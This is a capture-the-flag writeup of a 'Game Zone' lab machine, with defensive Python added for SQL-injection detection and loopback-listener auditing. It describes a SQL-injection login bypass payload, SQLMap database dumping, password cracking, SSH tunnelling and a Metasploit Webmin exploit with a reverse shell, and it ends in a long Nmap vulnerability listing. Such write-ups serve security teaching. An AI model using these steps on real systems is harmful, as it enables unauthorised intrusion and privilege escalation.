🎢 GAME ZONE
Learn to hack this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!
SUMMARY:
I started my hacking adventure by searching the machine's HTML code to find and get a good look at the image. I found it under a path, looked at it closely and it was related to "Hitman"; after searching for the character's name, I discovered it was "Agent 47".
My next step was to run an Nmap scan to identify the services on the machine. I only found ports 22 (SSH) and 80 (HTTP) open, so I decided to explore the website on port 80.
By entering ' or 1=1 -- - in the username field and leaving the password empty or filled in, I managed to log in and was redirected to portal.php. Once inside, I got enough information from the database's movie search function: I captured the REQUEST with BURPSUITE, saved it to a .txt file and used it to run SQLMap and extract data from the database. There it discovered two tables, HOST and USERS, and I found the username "agent47" and a hashed password.
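The login bypass above works because the portal builds its SQL by concatenating the submitted fields. The following example is added here and is not the room's code: it reproduces the bug against an in-memory SQLite table with a constructed user row (the "agent47" username is from the writeup, the password is made up and stored in plaintext only to keep the demo short), shows the parameterized query that neutralises the same input, and adds a small triage helper that flags the captured POST body the way a proxy or WAF log review would.

```python
import sqlite3
from urllib.parse import parse_qs


def build_db():
    """Constructed sample data (not from the page): one user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("agent47", "example-password"))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the quote closes the literal and `-- -` comments
    out the rest, so `... pwd = '' or 1=1` matches every row.
    Returns the first matched username or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pwd = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same lookup with bound parameters: the quote and the comment marker stay
    inside the string value and never reach the SQL parser."""
    sql = "SELECT username FROM users WHERE username = ? AND pwd = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Crude but useful for log triage: tokens that rarely belong in a credential.
INJECTION_MARKERS = ("'", '"', "--", "/*", " or ", " OR ")


def flag_login_body(body):
    """Parse a urlencoded POST body and return the names of the fields whose
    value carries quote, comment or tautology markers. A legitimate password
    containing a quote will also be flagged; treat the output as a lead, not a verdict."""
    fields = parse_qs(body, keep_blank_values=True)
    suspicious = []
    for name, values in fields.items():
        for value in values:
            padded = f" {value} "
            if any(marker in padded for marker in INJECTION_MARKERS):
                suspicious.append(name)
                break
    return suspicious


if __name__ == "__main__":
    db = build_db()
    # Body from the writeup's second Burp request, with the injection in the password field.
    captured = "username=P4IM0N&password=' or 1=1 -- -&x=27&y=5"
    print(login_vulnerable(db, "P4IM0N", "' or 1=1 -- -"))      # agent47
    print(login_parameterized(db, "P4IM0N", "' or 1=1 -- -"))  # None
    print(flag_login_body(captured))                            # ['password']
```

The fix is the parameterized query; the detection helper only exists so the same request can be recognised afterwards in access logs or proxy captures.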
Using JOHN THE RIPPER or the CRACKSTATION website, I cracked the password and gained SSH access to the system as the user "agent47". I grabbed the user flag and then decided to expose some of the machine's services using reverse SSH tunnels: ssh -L 10000:localhost:10000 agent47@10.10.182.25
That was when I noticed that the exposed CMS was Webmin. After logging in with the same agent47 credentials, I found that the Webmin version was 1.580.
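The Webmin service was invisible to the Nmap scan because it listens on loopback only, and it became reachable through the SSH port forward. The following example is added here and is not part of the writeup: from a defender's side it parses a constructed `ss -tlnp` listing (the process names and PIDs are made up; port 10000 is the Webmin port from the page), lists the loopback-only listeners that any SSH user could reach with `-L`, and checks whether `sshd_config` still allows TCP forwarding, which is the setting that closes that path when the service cannot be patched.

```python
import re
from dataclasses import dataclass

# Constructed sample of `ss -tlnp` output; not captured from the room's machine.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=1042,fd=3))
LISTEN  0       128     *:80                 *:*                users:(("apache2",pid=1200,fd=4))
LISTEN  0       128     127.0.0.1:10000      0.0.0.0:*          users:(("miniserv.pl",pid=1333,fd=5))
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=1101,fd=19))
"""


@dataclass
class Listener:
    addr: str
    port: int
    process: str

    @property
    def loopback_only(self):
        return self.addr.strip("[]") in ("127.0.0.1", "::1") or self.addr.startswith("127.")


def parse_ss(output):
    """Parse `ss -tlnp` lines into Listener records (header line skipped)."""
    listeners = []
    for line in output.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        match = re.search(r'\("([^"]+)"', fields[5])
        listeners.append(Listener(addr, int(port), match.group(1) if match else "?"))
    return listeners


def tunnel_reachable(listeners):
    """Loopback-only listeners never show up in an external port scan, but any
    account with SSH access can reach them through local port forwarding
    (the `ssh -L` used in the writeup) unless sshd forbids it."""
    return [l for l in listeners if l.loopback_only]


def sshd_forwarding_allowed(sshd_config_text):
    """True unless sshd_config disables local TCP forwarding. OpenSSH uses the
    first occurrence of a keyword and defaults AllowTcpForwarding to yes;
    'yes', 'all' and 'local' all permit -L style forwards."""
    for line in sshd_config_text.splitlines():
        line = line.split("#", 1)[0].strip()
        match = re.match(r"(?i)AllowTcpForwarding\s+(\S+)", line)
        if match:
            return match.group(1).lower() in ("yes", "all", "local")
    return True


if __name__ == "__main__":
    for l in tunnel_reachable(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"loopback-only listener: {l.process} on {l.addr}:{l.port}")
    print("forwarding allowed:", sshd_forwarding_allowed("AllowTcpForwarding no\n"))
```

On a host where such listeners are expected, the inventory is still worth keeping: an old Webmin on 127.0.0.1:10000 is one credential away from a root shell, as the rest of this writeup shows, and disabling forwarding for ordinary accounts removes the bridge between the two.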
Searching in Metasploit, I found an EXPLOIT for Webmin (unix/webapp/webmin_show_cgi_exec) and the PAYLOAD (cmd/unix/reverse), and I configured both with the required options (note that, since we set up the SSH tunnel over our localhost, RHOST had to be set to that localhost we mounted, not directly to the victim machine's IP, because otherwise authentication failed, since it really takes place over localhost). After running the exploit, I obtained the long-awaited privilege escalation to root by receiving this reverse shell.
In short, my journey ranged from finding clues in images to exploiting SQLi vulnerabilities, cracking passwords, exposing services and, finally, escalating privileges to root. An exciting experience in the world of hacking!
OFFENSIVE PENTESTING:
GAME ZONE:
-------------------- WEB ANALYSIS
WE INSPECT THE PHOTO IN THE HTML AND SEE THAT IT IS LOADED FROM THE CSS, WHERE THE IMAGE CAN BE SEEN BETTER, AND IT IS HITMAN:
HTML:
<div id="body_image"> </div>
CSS:
margin: 0px 0px 0px 194px;
height: 431px;
width: 580px;
background: url('images/header_image.png') transparent no-repeat 100% -1px;
z-index: 1;
position: absolute;
overflow: hidden;
THE NAME IT WANTED WAS agent 47, BINGO.
-------------- NMAP
NMAP SCAN OF THE IP 10.10.125.35:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script "vuln" 10.10.125.35
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-30 23:01 UTC
Nmap scan report for ip-10-10-125-35.eu-west-1.compute.internal (10.10.125.35)
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.2p2:
| PRION:CVE-2016-8858 7.8 https://vulners.com/prion/PRION:CVE-2016-8858
| PRION:CVE-2016-6515 7.8 https://vulners.com/prion/PRION:CVE-2016-6515
| PACKETSTORM:140070 7.8 https://vulners.com/packetstorm/PACKETSTORM:140070 *EXPLOIT*
| EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 7.8 https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 *EXPLOIT*
| EDB-ID:40888 7.8 https://vulners.com/exploitdb/EDB-ID:40888 *EXPLOIT*
| CVE-2016-8858 7.8 https://vulners.com/cve/CVE-2016-8858
| CVE-2016-6515 7.8 https://vulners.com/cve/CVE-2016-6515
| 1337DAY-ID-26494 7.8 https://vulners.com/zdt/1337DAY-ID-26494 *EXPLOIT*
| SSV:92579 7.5 https://vulners.com/seebug/SSV:92579 *EXPLOIT*
| PRION:CVE-2023-35784 7.5 https://vulners.com/prion/PRION:CVE-2023-35784
| PRION:CVE-2016-10009 7.5 https://vulners.com/prion/PRION:CVE-2016-10009
| PACKETSTORM:173661 7.5 https://vulners.com/packetstorm/PACKETSTORM:173661 *EXPLOIT*
| CVE-2023-35784 7.5 https://vulners.com/cve/CVE-2023-35784
| CVE-2016-10009 7.5 https://vulners.com/cve/CVE-2016-10009
| 1337DAY-ID-26576 7.5 https://vulners.com/zdt/1337DAY-ID-26576 *EXPLOIT*
| SSV:92582 7.2 https://vulners.com/seebug/SSV:92582 *EXPLOIT*
| PRION:CVE-2016-10012 7.2 https://vulners.com/prion/PRION:CVE-2016-10012
| PRION:CVE-2015-8325 7.2 https://vulners.com/prion/PRION:CVE-2015-8325
| CVE-2016-10012 7.2 https://vulners.com/cve/CVE-2016-10012
| CVE-2015-8325 7.2 https://vulners.com/cve/CVE-2015-8325
| SSV:92580 6.9 https://vulners.com/seebug/SSV:92580 *EXPLOIT*
| PRION:CVE-2016-10010 6.9 https://vulners.com/prion/PRION:CVE-2016-10010
| CVE-2016-10010 6.9 https://vulners.com/cve/CVE-2016-10010
| 1337DAY-ID-26577 6.9 https://vulners.com/zdt/1337DAY-ID-26577 *EXPLOIT*
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| SSV:91041 5.5 https://vulners.com/seebug/SSV:91041 *EXPLOIT*
| PRION:CVE-2016-3115 5.5 https://vulners.com/prion/PRION:CVE-2016-3115
| PACKETSTORM:140019 5.5 https://vulners.com/packetstorm/PACKETSTORM:140019 *EXPLOIT*
| PACKETSTORM:136234 5.5 https://vulners.com/packetstorm/PACKETSTORM:136234 *EXPLOIT*
| EXPLOITPACK:F92411A645D85F05BDBD274FD222226F 5.5 https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F *EXPLOIT*
| EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 5.5 https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 *EXPLOIT*
| EXPLOITPACK:1902C998CBF9154396911926B4C3B330 5.5 https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330 *EXPLOIT*
| EDB-ID:40858 5.5 https://vulners.com/exploitdb/EDB-ID:40858 *EXPLOIT*
| EDB-ID:40119 5.5 https://vulners.com/exploitdb/EDB-ID:40119 *EXPLOIT*
| EDB-ID:39569 5.5 https://vulners.com/exploitdb/EDB-ID:39569 *EXPLOIT*
| CVE-2016-3115 5.5 https://vulners.com/cve/CVE-2016-3115
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PRION:CVE-2023-27567 5.0 https://vulners.com/prion/PRION:CVE-2023-27567
| PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919
| PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473
| PRION:CVE-2017-15906 5.0 https://vulners.com/prion/PRION:CVE-2017-15906
| PRION:CVE-2016-10708 5.0 https://vulners.com/prion/PRION:CVE-2016-10708
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 5.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
| EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
| EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT*
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
| PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905
| PRION:CVE-2023-29323 4.3 https://vulners.com/prion/PRION:CVE-2023-29323
| PRION:CVE-2016-6210 4.3 https://vulners.com/prion/PRION:CVE-2016-6210
| EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF *EXPLOIT*
| EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF *EXPLOIT*
| EDB-ID:40136 4.3 https://vulners.com/exploitdb/EDB-ID:40136 *EXPLOIT*
| EDB-ID:40113 4.3 https://vulners.com/exploitdb/EDB-ID:40113 *EXPLOIT*
| CVE-2023-29323 4.3 https://vulners.com/cve/CVE-2023-29323
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-6210 4.3 https://vulners.com/cve/CVE-2016-6210
| 1337DAY-ID-25440 4.3 https://vulners.com/zdt/1337DAY-ID-25440 *EXPLOIT*
| 1337DAY-ID-25438 4.3 https://vulners.com/zdt/1337DAY-ID-25438 *EXPLOIT*
| PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110
| PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| PRION:CVE-2019-6111 2.6 https://vulners.com/prion/PRION:CVE-2019-6111
| PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
| SSV:92581 2.1 https://vulners.com/seebug/SSV:92581 *EXPLOIT*
| PRION:CVE-2016-10011 2.1 https://vulners.com/prion/PRION:CVE-2016-10011
| CVE-2016-10011 2.1 https://vulners.com/cve/CVE-2016-10011
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
| PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT*
| PACKETSTORM:138006 0.0 https://vulners.com/packetstorm/PACKETSTORM:138006 *EXPLOIT*
| PACKETSTORM:137942 0.0 https://vulners.com/packetstorm/PACKETSTORM:137942 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| PACKETSTORM:176334 7.5 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT*
| OSV:BIT-APACHE-2023-25690 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
| OSV:BIT-APACHE-2022-31813 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
| OSV:BIT-APACHE-2022-23943 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
| OSV:BIT-APACHE-2022-22720 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
| OSV:BIT-APACHE-2021-44790 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
| OSV:BIT-APACHE-2021-42013 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
| OSV:BIT-APACHE-2021-41773 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
| OSV:BIT-APACHE-2021-39275 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
| OSV:BIT-APACHE-2021-26691 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
| OSV:BIT-APACHE-2020-11984 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
| MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- 7.5 https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
| MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- 7.5 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
| F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 7.5 https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 *EXPLOIT*
| EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT*
| EDB-ID:50512 7.5 https://vulners.com/exploitdb/EDB-ID:50512 *EXPLOIT*
| EDB-ID:50446 7.5 https://vulners.com/exploitdb/EDB-ID:50446 *EXPLOIT*
| EDB-ID:50406 7.5 https://vulners.com/exploitdb/EDB-ID:50406 *EXPLOIT*
| E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 7.5 https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 *EXPLOIT*
| CVE-2023-25690 7.5 https://vulners.com/cve/CVE-2023-25690
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| CC15AE65-B697-525A-AF4B-38B1501CAB49 7.5 https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49 *EXPLOIT*
| 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 7.5 https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 *EXPLOIT*
| 8713FD59-264B-5FD7-8429-3251AB5AB3B8 7.5 https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8 *EXPLOIT*
| 6A0A657E-8300-5312-99CE-E11F460B1DBF 7.5 https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF *EXPLOIT*
| 61075B23-F713-537A-9B84-7EB9B96CF228 7.5 https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228 *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 7.5 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 5312D04F-9490-5472-84FA-86B3BBDC8928 7.5 https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928 *EXPLOIT*
| 52E13088-9643-5E81-B0A0-B7478BCF1F2C 7.5 https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 7.5 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 22DCCD26-B68C-5905-BAC2-71D10DE3F123 7.5 https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123 *EXPLOIT*
| 2108729F-1E99-54EF-9A4B-47299FD89FF2 7.5 https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2 *EXPLOIT*
| 1337DAY-ID-39214 7.5 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427 *EXPLOIT*
| 1337DAY-ID-37777 7.5 https://vulners.com/zdt/1337DAY-ID-37777 *EXPLOIT*
| 1337DAY-ID-36952 7.5 https://vulners.com/zdt/1337DAY-ID-36952 *EXPLOIT*
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
| EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 *EXPLOIT*
| OSV:BIT-APACHE-2021-40438 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
| OSV:BIT-APACHE-2020-35452 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2016-5387 6.8 https://vulners.com/cve/CVE-2016-5387
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT*
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| OSV:BIT-APACHE-2022-28615 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
| OSV:BIT-APACHE-2021-44224 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
| OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| OSV:BIT-APACHE-2022-22721 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
| OSV:BIT-APACHE-2020-1927 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 *EXPLOIT*
| OSV:BIT-APACHE-2022-36760 5.1 https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
| CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
| OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
| OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
| OSV:BIT-APACHE-2023-27522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
| OSV:BIT-APACHE-2022-37436 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
| OSV:BIT-APACHE-2022-30556 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
| OSV:BIT-APACHE-2022-30522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
| OSV:BIT-APACHE-2022-29404 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
| OSV:BIT-APACHE-2022-28614 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
| OSV:BIT-APACHE-2022-28330 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
| OSV:BIT-APACHE-2022-26377 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
| OSV:BIT-APACHE-2022-22719 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
| OSV:BIT-APACHE-2021-41524 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
| OSV:BIT-APACHE-2021-36160 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
| OSV:BIT-APACHE-2021-34798 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
| OSV:BIT-APACHE-2021-33193 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
| OSV:BIT-APACHE-2021-31618 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:BIT-APACHE-2021-30641 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
| OSV:BIT-APACHE-2021-26690 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
| OSV:BIT-APACHE-2020-9490 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
| OSV:BIT-APACHE-2020-1934 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
| OSV:BIT-APACHE-2020-13950 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
| OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802
| OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622
| F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EXPLOITPACK:2666FB0676B4B582D689921651A30355 5.0 https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355 *EXPLOIT*
| EDB-ID:42745 5.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| EDB-ID:40909 5.0 https://vulners.com/exploitdb/EDB-ID:40909 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
